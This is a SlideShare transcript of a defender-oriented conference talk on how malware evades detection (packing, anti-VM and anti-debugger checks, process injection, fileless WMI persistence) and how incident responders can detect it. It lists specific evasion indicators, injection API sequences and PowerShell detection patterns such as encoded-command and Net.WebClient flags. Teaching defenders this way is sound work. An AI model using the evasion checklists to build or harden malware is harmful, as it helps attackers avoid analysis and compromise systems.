SlideShare a Scribd company logo

Let's Talk Technical: Malware Evasion and Detection

Download as PPTX, PDF
J
James Haughom Jr

This is from my talk at IR18 geared around evasion techniques employed by malware, and detection methods for incident responders. I touch on everything from ransomware, to evasive fileless WMI malware. My goal for this talk was to teach defenders about the inner-workings and capabilities of malware, as well as some detection methods they may have not considered.

1 of 41
Let’s talk technical: Malware Evasion and Detection James Haughom Jr XOR Security
Who am I? • Self taught cyber professional • Background in malware analysis/RE • XOR Security! • Windowless room for 10+ hours a day (SOClife) • Two degrees in music (totally relevant) • Shameless plug: http://rinseandrepeatanalysis.blogspot.com/ • Contact info: james.haughom@xorsecurity.com
Agenda • Topics: • Malware Evasion Techniques • Detection Techniques for Defenders • Why? • Evasive malware becomes more prevalent • Defenders must follow suit • Bye bye, signature-based detection! • What I pray to God you get out of it: • Thinking outside of the box for detection • Learn about some of malware’s innerworkings
Malware – all shapes and sizes PEs, PowerShell, and Shellcode.....oh my!
Microsoft Office Doc Malware Weaponization: • VBA Macros / OLE Objects • DDE • Embedded link/shortcut files (.settingcontent-ms, .iqy, .slk)
PDF Malware Weaponization: • /JavaScript • Embedded files (.exe, .settingcontent-ms, etc…) • Phishing links (boring.)
RTF Malware Weaponization: • OLE Objects (does not support macros) • Embedded files (.exe, shellcode, etc…) • Abuses native windows executables (powershell, regsvr, bitsadmin, certutil, etc…)
PowerShell, JavaScript, Shellcode Weaponization: • Usually embedded in other binaries • Used both for delivery and persistent payloads • Leveraged by Fileless and Evasive malware • Shellcode = PIC ready to hit the CPU
Portable Executables • .exe / .dll • Full persistent payload on disk • Most robust form of malware • Borland, C, C++, etc… • Abuse WinAPI • Native windows functions = API Calls • Ransomware, backdoors, trojans, worms, keyloggers, rootkits, etc… Malware.exe (process) Kernell32.dll CreateFile CreateProcess CreateThread (imported) ws_32.dll socket send Recv (imported) C:WindowsSystem32 Kernel32.dll (export) Ws_32.dll (export)
Evasion on disk, in memory, in transit..
Static Evasion - Packing • .EXEs / .DLLs = PACKED • Packing is a subset/type of obfuscation • Compression • VMProtect, Themida, Armadillo, etc.. • High entropy/low import count • Weird static properties • APIs: • LoadLibrary • GetProcAddress • VirtualAlloc • RtlDecompressBuffer • Hides functionality of the malware • Hides strings, imports, etc… • Evade AV
Static Evasion - Obfuscation • Non-PE malware is technically not packed, but obfuscated: • Garbage code • Pointless Arithmetic • Concatenation of important strings at runtime • Randomized variable names • Unused variables/functions • Multiple layers/languages • Replace(), chr(), Vbkey() • Simple encoding (XOR, Base64, Hex) • Compression (PowerShell) • Randomized order of functions
Trojanization • Masquerading as a system process: • Svchost.exe running out of AppData • Running as a service: • Background service • Svchost.exe with malicious dll • Masquerading as downloaded software
Environment-aware: Process activity • FindWindow API Call • GetModuleHandle • List running processes and compare: 1. Get a process listing: CreateToolhelp32Snapshot, EnumProcesses 2. Iterate through the list of processes: Process32First, Process32Next 3. Compare results of process listing • Virtualization: • VBoxService.exe, Vmtoolsd.exe, Vmwareuser.exe • Malware Lab: • procmon.exe, procexp.exe, wireshark.exe • Debuggers: • Ollydbg.exe, windbg.exe, x64dbg.exe
FindWindow GetModuleHandleA
File System / Registry Traverse File System Query Registry • Virtualization: • HKLMHARDWAREDEVICEMAPScsiScsi Port 0Scsi Bus 0Target Id 0Logical Unit Id 0“Identifier”;“VMWARE” • HKLMSOFTWAREVMware, Inc.VMware Tools • HKLMHARDWAREDescriptionSystem “SystemBiosVersion”;”VMWARE” • HKLMHARDWAREDescriptionSystem”SystemBios Version”;VBOX • HKLMSOFTWAREOracleVirtualBox Guest Additions • HKLMHARDWAREACPIDSDTVBOX • Malware Lab: • Residue from non-standalone tools • Virtualization: • C:WINDOWSsystem32driversVBoxMouse.sys • C:WINDOWSsystem32vboxhook.dll • C:WINDOWSsystem32vboxdisp.dll • C:Windowssystem32driversvmmouse.sys • C:system32driversvmhgfs.sys • Malware Lab: • Installation files , dependencies, dlls • Wireshark, Process Hacker, etc… • Sandbox: • Lack of data on the file system • AV: • Installation files, dependences, dlls
RegOpenKey GetCommandLine
Hardware • Detect Virtualization/Lab/Sandbox: • Common MAC addresses • VirtualBox - 08:00:27 • Vmware - 00:0C:29, 00:1C:14, 00:50:56, or 00:05:69 • Check RAM/Cores: • If too robust, may exit
Sandbox • Detect Sandbox: • Check system time • Successful internet access • HttpSendRequest  google.com • Mouse/keyboard activity • Empty clipboard • Sleep loop • Malware name • Some sandboxes name the malware its hash when executing • Some sandboxes name it malware malware.exe
Debuggers • Detect Debuggers: • Timing: • GetTickCount – if (GetTickCount1 – GetTickCount2 > x){ EXIT } • GetSystemTime if (GetSystemTime1 – GetSystemTime2 > x){ EXIT } • WinAPI Calls • IsDebuggerPresent, OutputDebugString, CheckRemoteDebugger, QueryInformationProcess • Manually checking flags within data structures • PEB – fs:[30] + 0x2 // gs:[60] + 0x2 • SeDebugPrivilege flag • Check running processes for common debuggers • ollydbg, x64dbg, immunity, etc…. • FindWindow • Parameter of ollydbg, x64dbg, etc… • Abuse of the Structured Exception Handler • TLS Callback Functions • The Red Pill
Miscellaneous Evasion • Cleaning up after itself: • Config files, dependencies, residue, artifacts, itself, timestomping, etc.... • Evading signatures: • Randomly generate filenames or registry values • DGA – Domain Generation Algorithm • Client/server-side • Hash or refer to sections of itself to detect tampering • Arguments.callee in JS • PEs that hash sections of own code • Hide from task manager/tasklist • Unlink itself from doubly linked list  PsActiveProcessHead • Behavior dependent on other running processes • E.g. Coinminer looking for task manager • DLL Load Order Hijacking
Before timestomp
After timestomp
Code injection • Different Flavors: • Process Hollowing + Injection • CreateProcess (suspended)… • CreationFlag = 0x00000004 • UnmapViewOfSection … • WriteProcessMemory… • ResumeThread… • DLL injection • VirtualAllocEx • WriteProcessMemory • CreateRemoteThread • LoadLibrary • API Hooking • Interception/interference of code • IAT Hooking • Inline Hooking (trampoline) • Shellcode injection • Unpacking technique • Process Doppelganging
Malware analysis for hedgehogs - http://struppigel.blogspot.com/2017/07/process-injection-info-graphic.html
CreateRemoteThread Inline Hooking
Evasion in transit • Blending in with expected traffic: • Heavily used ports (53, 80, 443) • Benign-looking UserAgent • Less monitored by tools: • DNS is common for phoning home • Hiding comms: • Encryption • XOR • Simple encoding • DGA • C2 Redundancy • Referrer loops through domains until 200 https://www.us-cert.gov/sites/default/files/publications/MAR- 10135536-G.PDF
Fileless…ish malware • Payload in the registry • Scripts passed to native windows executables • No files dropped to file system • PowerShell / JS • WinAPI abuse • Inject Shellcode • Uses run keys for persistence • Examples • Kovter • Poweliks • Misfox
Fileless……………ish malware cont’d • WMI • Payload in WMI repository • No files dropped to file system • Persist across reboots • AV/EDRs will not see it • Persistence = Permanent Event Subscription (rootsubscription) • Requires: • EventFilter (trigger / condition) • EventConsumer (action / payload) • FilterToConsumerBinding (binds the two) • Examples: • Poshspy • Hammertoss
Detection catch me if you can
Detecting Delivery - host • Most common delivery methods: • Malicious email attachment • Drive by download • Parent/child process relationship anomalies: • Detection: Email Attachment Drive by download Outlook.exe ..winword.exe …powershell.exe ….malware.exe iexplore.exe ..malware.exe Email Attachment Drive by download Office applications spawning powershell.exe, cmd.exe, wscript.exe, etc…. Browser spawning unexpected process (whitelist) Email Attachment Drive by download Carbon Black Tanium Windows Event Logs (4688) Carbon Black Tanium Windows Event Logs (4688) Tool(s) for Detection:
Detection - network • UserAgent anomalies: • 1 offs • Slight deviations from expected UAs • System processes that shouldn’t be calling out • Certutil, bitsadmin, regsvr, mshta, etc… • Lack of UserAgent • Fav of malware authors = PowerShell Net.Webclient Class + Download(File|String)  Blank UA! PowerShell Net.Webclient class (blank) BITSAdmin iexplore.exe Kovter
Detection: Process Activity • System processes behaving badly: • Running out of incorrect directory • Running under incorrect Parent Process • Anomalous DLLs • Unlinked DLLs • Anomalous network connections from system processes • DLL Load Order Hijacking
Execution Detection: Code Injection • Anomalous process/thread activity • Cross process activity • Remote thread activity • Anomalous regions of memory (rights) • Memory protection constants • Read, Copy, Write, Execute, etc… • Code Injection protection constants: • RWX • RCX • FPs = csrss.exe, lsass.exe, svchost.exe https://gist.github.com/jaredcatkinson/23905d34537ce4b5b1818c3e6405c1d2
Pattern Matching - Yara • Scanning file systems/memory with Yara signatures • Pattern match specific malware families or profile malware based off of APIs/strings • AV detections are often proprietary, don’t know what specifically makes them fire • At the perimeter or routine scans
Detecting Persistence: Favorites • Monitoring heavily used persistence mechanisms: • (HKLM|HKCU)Software MicrosoftWindowsCurrentVersion Run • HKLMSYSTEMCurrentControlSet Services • These autorun locations should not be modified often (especially not the values under HKLM) • Scheduled Tasks • WMI
Leveraging WMI • Use at scale for cheap (sysadmin style) • Lower visibility than most AV/EDR • Level the playing field • Anomalous process’ privileges • WMI spawns processes under PPID wmiprvse.exe
WMI via PS • Check for: • Persistence (FilterToConsumerBinding): • gwmi -Namespace rootsubscription -Class __FilterToConsumerBinding • Trigger/Condition (EventFilter): • gwmi -Namespace rootsubscription -Class __EventFilter • Action/Payload (EventConsumer): • gwmi -Namespace rootsubscription -Class __EventConsumer • Anomalous namespaces: • gwmi -Namespace root -class __NameSpace | select name • = database of classes/instances • Anomalous classes: • gwmi -Namespace [NameSpace] -list • = managing specific objects
Misc Detections • Clean up: • 1102: The audit log was cleared • PowerShell auditing • Get-WinEvent -LogName 'Windows PowerShell' • -EncodedCommand / -enc / -e • -nop • Net.WebClient • ‘[a-zA-Z0-9/+=]{20,}’ • -ExecutionPolicy bypass • Process relationships • Sweep for other stuff: • Mutexes, registry values, weird file types (.iqy, .slk, etc..), .pf for known bad (malware.exe.xxxx.pf) • Correlate events: • JS followed by .exe download • .exe download + Weird UA
Thank you! https://www.linkedin.com/in/james-haughom-jr-248748129 http://rinseandrepeatanalysis.blogspot.com james.haughom@xorsecurity.com These slides can be found on my blog or linkedin!

Recommended

SIEM : Security Information and Event Management
SIEM : Security Information and Event Management SIEM : Security Information and Event Management
SIEM : Security Information and Event Management
SHRIYARAI4
 
What is SIEM? A Brilliant Guide to the Basics
What is SIEM? A Brilliant Guide to the BasicsWhat is SIEM? A Brilliant Guide to the Basics
What is SIEM? A Brilliant Guide to the Basics
Sagar Joshi
 
Sigma and YARA Rules
Sigma and YARA RulesSigma and YARA Rules
Sigma and YARA Rules
Lionel Faleiro
 
Rothke rsa 2012 building a security operations center (soc)
Rothke rsa 2012 building a security operations center (soc)Rothke rsa 2012 building a security operations center (soc)
Rothke rsa 2012 building a security operations center (soc)
Ben Rothke
 
Effective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceEffective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat Intelligence
Dhruv Majumdar
 
Threat Modeling Lessons From Star Wars
Threat Modeling Lessons From Star WarsThreat Modeling Lessons From Star Wars
Threat Modeling Lessons From Star Wars
Adam Shostack
 
Security Information and Event Management (SIEM)
Security Information and Event Management (SIEM)Security Information and Event Management (SIEM)
Security Information and Event Management (SIEM)
k33a
 
SIEM Primer:
SIEM Primer:SIEM Primer:
SIEM Primer:
Anton Chuvakin
 

Recommended

SIEM : Security Information and Event Management
SIEM : Security Information and Event Management SIEM : Security Information and Event Management
SIEM : Security Information and Event Management
SHRIYARAI4
 
What is SIEM? A Brilliant Guide to the Basics
What is SIEM? A Brilliant Guide to the BasicsWhat is SIEM? A Brilliant Guide to the Basics
What is SIEM? A Brilliant Guide to the Basics
Sagar Joshi
 
Sigma and YARA Rules
Sigma and YARA RulesSigma and YARA Rules
Sigma and YARA Rules
Lionel Faleiro
 
Rothke rsa 2012 building a security operations center (soc)
Rothke rsa 2012 building a security operations center (soc)Rothke rsa 2012 building a security operations center (soc)
Rothke rsa 2012 building a security operations center (soc)
Ben Rothke
 
Effective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceEffective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat Intelligence
Dhruv Majumdar
 
Threat Modeling Lessons From Star Wars
Threat Modeling Lessons From Star WarsThreat Modeling Lessons From Star Wars
Threat Modeling Lessons From Star Wars
Adam Shostack
 
Security Information and Event Management (SIEM)
Security Information and Event Management (SIEM)Security Information and Event Management (SIEM)
Security Information and Event Management (SIEM)
k33a
 
SIEM Primer:
SIEM Primer:SIEM Primer:
SIEM Primer:
Anton Chuvakin
 
Basic malware analysis
Basic malware analysisBasic malware analysis
Basic malware analysis
securityxploded
 
Monitoring using Prometheus and Grafana
Monitoring using Prometheus and GrafanaMonitoring using Prometheus and Grafana
Monitoring using Prometheus and Grafana
Arvind Kumar G.S
 
IBM Qradar & resilient
IBM Qradar & resilientIBM Qradar & resilient
IBM Qradar & resilient
Prime Infoserv
 
Modern vs. Traditional SIEM
Modern vs. Traditional SIEM Modern vs. Traditional SIEM
Modern vs. Traditional SIEM
Alert Logic
 
CyCon 2019 - A Day in the Life of a Reverse Engineer
CyCon 2019 - A Day in the Life of a Reverse EngineerCyCon 2019 - A Day in the Life of a Reverse Engineer
CyCon 2019 - A Day in the Life of a Reverse Engineer
James Haughom Jr
 
Soc analyst course content v3
Soc analyst course content v3Soc analyst course content v3
Soc analyst course content v3
ShivamSharma909
 
SIEM Architecture
SIEM ArchitectureSIEM Architecture
SIEM Architecture
Nishanth Kumar Pathi
 
Hacker Halted 2016 - How to get into ICS security
Hacker Halted 2016 - How to get into ICS securityHacker Halted 2016 - How to get into ICS security
Hacker Halted 2016 - How to get into ICS security
Chris Sistrunk
 
Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting season
Ben Boyd
 
Threat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceThreat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement Matrice
Vishal Kumar
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows Environment
Teymur Kheirkhabarov
 
Iso 27001 foundation sample slides
Iso 27001 foundation sample slidesIso 27001 foundation sample slides
Iso 27001 foundation sample slides
Stratos Lazaridis
 
Detecting WMI Exploitation v1.1
Detecting WMI Exploitation v1.1Detecting WMI Exploitation v1.1
Detecting WMI Exploitation v1.1
Michael Gough
 
Cyber threat Intelligence and Incident Response by:-Sandeep Singh
Cyber threat Intelligence and Incident Response by:-Sandeep SinghCyber threat Intelligence and Incident Response by:-Sandeep Singh
Cyber threat Intelligence and Incident Response by:-Sandeep Singh
OWASP Delhi
 
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzBSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
Christopher Gerritz
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-on
Splunk
 
Introduction to QRadar
Introduction to QRadarIntroduction to QRadar
Introduction to QRadar
PencilData
 
Security Information Event Management - nullhyd
Security Information Event Management - nullhydSecurity Information Event Management - nullhyd
Security Information Event Management - nullhyd
n|u - The Open Security Community
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
Sergey Soldatov
 
Lesson 3- Effectiveness of IDPS
Lesson 3- Effectiveness of IDPSLesson 3- Effectiveness of IDPS
Lesson 3- Effectiveness of IDPS
MLG College of Learning, Inc
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
Joff Thyer
 
Logs, Logs, Logs - What you need to know to catch a thief
Logs, Logs, Logs - What you need to know to catch a thiefLogs, Logs, Logs - What you need to know to catch a thief
Logs, Logs, Logs - What you need to know to catch a thief
Michael Gough
 

More Related Content

What's hot

Basic malware analysis
Basic malware analysisBasic malware analysis
Basic malware analysis
securityxploded
 
Monitoring using Prometheus and Grafana
Monitoring using Prometheus and GrafanaMonitoring using Prometheus and Grafana
Monitoring using Prometheus and Grafana
Arvind Kumar G.S
 
IBM Qradar & resilient
IBM Qradar & resilientIBM Qradar & resilient
IBM Qradar & resilient
Prime Infoserv
 
Modern vs. Traditional SIEM
Modern vs. Traditional SIEM Modern vs. Traditional SIEM
Modern vs. Traditional SIEM
Alert Logic
 
CyCon 2019 - A Day in the Life of a Reverse Engineer
CyCon 2019 - A Day in the Life of a Reverse EngineerCyCon 2019 - A Day in the Life of a Reverse Engineer
CyCon 2019 - A Day in the Life of a Reverse Engineer
James Haughom Jr
 
Soc analyst course content v3
Soc analyst course content v3Soc analyst course content v3
Soc analyst course content v3
ShivamSharma909
 
SIEM Architecture
SIEM ArchitectureSIEM Architecture
SIEM Architecture
Nishanth Kumar Pathi
 
Hacker Halted 2016 - How to get into ICS security
Hacker Halted 2016 - How to get into ICS securityHacker Halted 2016 - How to get into ICS security
Hacker Halted 2016 - How to get into ICS security
Chris Sistrunk
 
Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting season
Ben Boyd
 
Threat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceThreat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement Matrice
Vishal Kumar
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows Environment
Teymur Kheirkhabarov
 
Iso 27001 foundation sample slides
Iso 27001 foundation sample slidesIso 27001 foundation sample slides
Iso 27001 foundation sample slides
Stratos Lazaridis
 
Detecting WMI Exploitation v1.1
Detecting WMI Exploitation v1.1Detecting WMI Exploitation v1.1
Detecting WMI Exploitation v1.1
Michael Gough
 
Cyber threat Intelligence and Incident Response by:-Sandeep Singh
Cyber threat Intelligence and Incident Response by:-Sandeep SinghCyber threat Intelligence and Incident Response by:-Sandeep Singh
Cyber threat Intelligence and Incident Response by:-Sandeep Singh
OWASP Delhi
 
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzBSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
Christopher Gerritz
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-on
Splunk
 
Introduction to QRadar
Introduction to QRadarIntroduction to QRadar
Introduction to QRadar
PencilData
 
Security Information Event Management - nullhyd
Security Information Event Management - nullhydSecurity Information Event Management - nullhyd
Security Information Event Management - nullhyd
n|u - The Open Security Community
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
Sergey Soldatov
 
Lesson 3- Effectiveness of IDPS
Lesson 3- Effectiveness of IDPSLesson 3- Effectiveness of IDPS
Lesson 3- Effectiveness of IDPS
MLG College of Learning, Inc
 

What's hot (20)

Basic malware analysis
Basic malware analysisBasic malware analysis
Basic malware analysis
 
Monitoring using Prometheus and Grafana
Monitoring using Prometheus and GrafanaMonitoring using Prometheus and Grafana
Monitoring using Prometheus and Grafana
 
IBM Qradar & resilient
IBM Qradar & resilientIBM Qradar & resilient
IBM Qradar & resilient
 
Modern vs. Traditional SIEM
Modern vs. Traditional SIEM Modern vs. Traditional SIEM
Modern vs. Traditional SIEM
 
CyCon 2019 - A Day in the Life of a Reverse Engineer
CyCon 2019 - A Day in the Life of a Reverse EngineerCyCon 2019 - A Day in the Life of a Reverse Engineer
CyCon 2019 - A Day in the Life of a Reverse Engineer
 
Soc analyst course content v3
Soc analyst course content v3Soc analyst course content v3
Soc analyst course content v3
 
SIEM Architecture
SIEM ArchitectureSIEM Architecture
SIEM Architecture
 
Hacker Halted 2016 - How to get into ICS security
Hacker Halted 2016 - How to get into ICS securityHacker Halted 2016 - How to get into ICS security
Hacker Halted 2016 - How to get into ICS security
 
Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting season
 
Threat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceThreat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement Matrice
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows Environment
 
Iso 27001 foundation sample slides
Iso 27001 foundation sample slidesIso 27001 foundation sample slides
Iso 27001 foundation sample slides
 
Detecting WMI Exploitation v1.1
Detecting WMI Exploitation v1.1Detecting WMI Exploitation v1.1
Detecting WMI Exploitation v1.1
 
Cyber threat Intelligence and Incident Response by:-Sandeep Singh
Cyber threat Intelligence and Incident Response by:-Sandeep SinghCyber threat Intelligence and Incident Response by:-Sandeep Singh
Cyber threat Intelligence and Incident Response by:-Sandeep Singh
 
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzBSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-on
 
Introduction to QRadar
Introduction to QRadarIntroduction to QRadar
Introduction to QRadar
 
Security Information Event Management - nullhyd
Security Information Event Management - nullhydSecurity Information Event Management - nullhyd
Security Information Event Management - nullhyd
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
 
Lesson 3- Effectiveness of IDPS
Lesson 3- Effectiveness of IDPSLesson 3- Effectiveness of IDPS
Lesson 3- Effectiveness of IDPS
 

Similar to Let's Talk Technical: Malware Evasion and Detection

BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
Joff Thyer
 
Logs, Logs, Logs - What you need to know to catch a thief
Logs, Logs, Logs - What you need to know to catch a thiefLogs, Logs, Logs - What you need to know to catch a thief
Logs, Logs, Logs - What you need to know to catch a thief
Michael Gough
 
CNIT 152: 12b Windows Registry
CNIT 152: 12b Windows RegistryCNIT 152: 12b Windows Registry
CNIT 152: 12b Windows Registry
Sam Bowne
 
CNIT 152: 12 Investigating Windows Systems (Part 2 of 3)
CNIT 152: 12 Investigating Windows Systems (Part 2 of 3)CNIT 152: 12 Investigating Windows Systems (Part 2 of 3)
CNIT 152: 12 Investigating Windows Systems (Part 2 of 3)
Sam Bowne
 
Building next gen malware behavioural analysis environment
Building next gen malware behavioural analysis environment Building next gen malware behavioural analysis environment
Building next gen malware behavioural analysis environment
isc2-hellenic
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
Teymur Kheirkhabarov
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
Sergey Soldatov
 
Logging for hackers SAINTCON
Logging for hackers SAINTCONLogging for hackers SAINTCON
Logging for hackers SAINTCON
Michael Gough
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat Hunting
GIBIN JOHN
 
Logging for Hackers - What you need to know to catch them
Logging for Hackers - What you need to know to catch themLogging for Hackers - What you need to know to catch them
Logging for Hackers - What you need to know to catch them
Michael Gough
 
Anomalies Detection: Windows OS - Part 1
Anomalies Detection: Windows OS - Part 1Anomalies Detection: Windows OS - Part 1
Anomalies Detection: Windows OS - Part 1
Rhydham Joshi
 
Anomalies Detection: Windows OS - Part 1
Anomalies Detection: Windows OS - Part 1Anomalies Detection: Windows OS - Part 1
Anomalies Detection: Windows OS - Part 1
Rhydham Joshi
 
Deeplook into apt and how to detect and defend v1.0
Deeplook into apt and how to detect and defend v1.0Deeplook into apt and how to detect and defend v1.0
Deeplook into apt and how to detect and defend v1.0
Michael Gough
 
12 Investigating Windows Systems (Part 2 of 3)
12 Investigating Windows Systems (Part 2 of 3)12 Investigating Windows Systems (Part 2 of 3)
12 Investigating Windows Systems (Part 2 of 3)
Sam Bowne
 
Defending Your "Gold"
Defending Your "Gold"Defending Your "Gold"
Defending Your "Gold"
Will Schroeder
 
CNIT 152 12 Investigating Windows Systems (Part 2)
CNIT 152 12 Investigating Windows Systems (Part 2)CNIT 152 12 Investigating Windows Systems (Part 2)
CNIT 152 12 Investigating Windows Systems (Part 2)
Sam Bowne
 
Forensics perspective ERFA-møde marts 2017
Forensics perspective ERFA-møde marts 2017 Forensics perspective ERFA-møde marts 2017
Forensics perspective ERFA-møde marts 2017
J Hartig
 
Proper logging can catch breaches like retail PoS
Proper logging can catch breaches like retail PoSProper logging can catch breaches like retail PoS
Proper logging can catch breaches like retail PoS
Michael Gough
 
Proper logging can catch breaches like retail PoS
Proper logging can catch breaches like retail PoSProper logging can catch breaches like retail PoS
Proper logging can catch breaches like retail PoS
Michael Gough
 
Logging for Hackers v1.0
Logging for Hackers v1.0Logging for Hackers v1.0
Logging for Hackers v1.0
Michael Gough
 

Similar to Let's Talk Technical: Malware Evasion and Detection (20)

BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
 
Logs, Logs, Logs - What you need to know to catch a thief
Logs, Logs, Logs - What you need to know to catch a thiefLogs, Logs, Logs - What you need to know to catch a thief
Logs, Logs, Logs - What you need to know to catch a thief
 
CNIT 152: 12b Windows Registry
CNIT 152: 12b Windows RegistryCNIT 152: 12b Windows Registry
CNIT 152: 12b Windows Registry
 
CNIT 152: 12 Investigating Windows Systems (Part 2 of 3)
CNIT 152: 12 Investigating Windows Systems (Part 2 of 3)CNIT 152: 12 Investigating Windows Systems (Part 2 of 3)
CNIT 152: 12 Investigating Windows Systems (Part 2 of 3)
 
Building next gen malware behavioural analysis environment
Building next gen malware behavioural analysis environment Building next gen malware behavioural analysis environment
Building next gen malware behavioural analysis environment
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
 
Logging for hackers SAINTCON
Logging for hackers SAINTCONLogging for hackers SAINTCON
Logging for hackers SAINTCON
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat Hunting
 
Logging for Hackers - What you need to know to catch them
Logging for Hackers - What you need to know to catch themLogging for Hackers - What you need to know to catch them
Logging for Hackers - What you need to know to catch them
 
Anomalies Detection: Windows OS - Part 1
Anomalies Detection: Windows OS - Part 1Anomalies Detection: Windows OS - Part 1
Anomalies Detection: Windows OS - Part 1
 
Anomalies Detection: Windows OS - Part 1
Anomalies Detection: Windows OS - Part 1Anomalies Detection: Windows OS - Part 1
Anomalies Detection: Windows OS - Part 1
 
Deeplook into apt and how to detect and defend v1.0
Deeplook into apt and how to detect and defend v1.0Deeplook into apt and how to detect and defend v1.0
Deeplook into apt and how to detect and defend v1.0
 
12 Investigating Windows Systems (Part 2 of 3)
12 Investigating Windows Systems (Part 2 of 3)12 Investigating Windows Systems (Part 2 of 3)
12 Investigating Windows Systems (Part 2 of 3)
 
Defending Your "Gold"
Defending Your "Gold"Defending Your "Gold"
Defending Your "Gold"
 
CNIT 152 12 Investigating Windows Systems (Part 2)
CNIT 152 12 Investigating Windows Systems (Part 2)CNIT 152 12 Investigating Windows Systems (Part 2)
CNIT 152 12 Investigating Windows Systems (Part 2)
 
Forensics perspective ERFA-møde marts 2017
Forensics perspective ERFA-møde marts 2017 Forensics perspective ERFA-møde marts 2017
Forensics perspective ERFA-møde marts 2017
 
Proper logging can catch breaches like retail PoS
Proper logging can catch breaches like retail PoSProper logging can catch breaches like retail PoS
Proper logging can catch breaches like retail PoS
 
Proper logging can catch breaches like retail PoS
Proper logging can catch breaches like retail PoSProper logging can catch breaches like retail PoS
Proper logging can catch breaches like retail PoS
 
Logging for Hackers v1.0
Logging for Hackers v1.0Logging for Hackers v1.0
Logging for Hackers v1.0
 

Recently uploaded

一比一原版南十字星大学毕业证(SCU毕业证书)学历如何办理
一比一原版南十字星大学毕业证(SCU毕业证书)学历如何办理一比一原版南十字星大学毕业证(SCU毕业证书)学历如何办理
一比一原版南十字星大学毕业证(SCU毕业证书)学历如何办理
slg6lamcq
 
社内勉強会資料_Hallucination of LLMs               .
社内勉強会資料_Hallucination of LLMs               .社内勉強会資料_Hallucination of LLMs               .
社内勉強会資料_Hallucination of LLMs               .
NABLAS株式会社
 
Orchestrating the Future: Navigating Today's Data Workflow Challenges with Ai...
Orchestrating the Future: Navigating Today's Data Workflow Challenges with Ai...Orchestrating the Future: Navigating Today's Data Workflow Challenges with Ai...
Orchestrating the Future: Navigating Today's Data Workflow Challenges with Ai...
Kaxil Naik
 
Open Source Contributions to Postgres: The Basics POSETTE 2024
Open Source Contributions to Postgres: The Basics POSETTE 2024Open Source Contributions to Postgres: The Basics POSETTE 2024
Open Source Contributions to Postgres: The Basics POSETTE 2024
ElizabethGarrettChri
 
一比一原版(曼大毕业证书)曼尼托巴大学毕业证如何办理
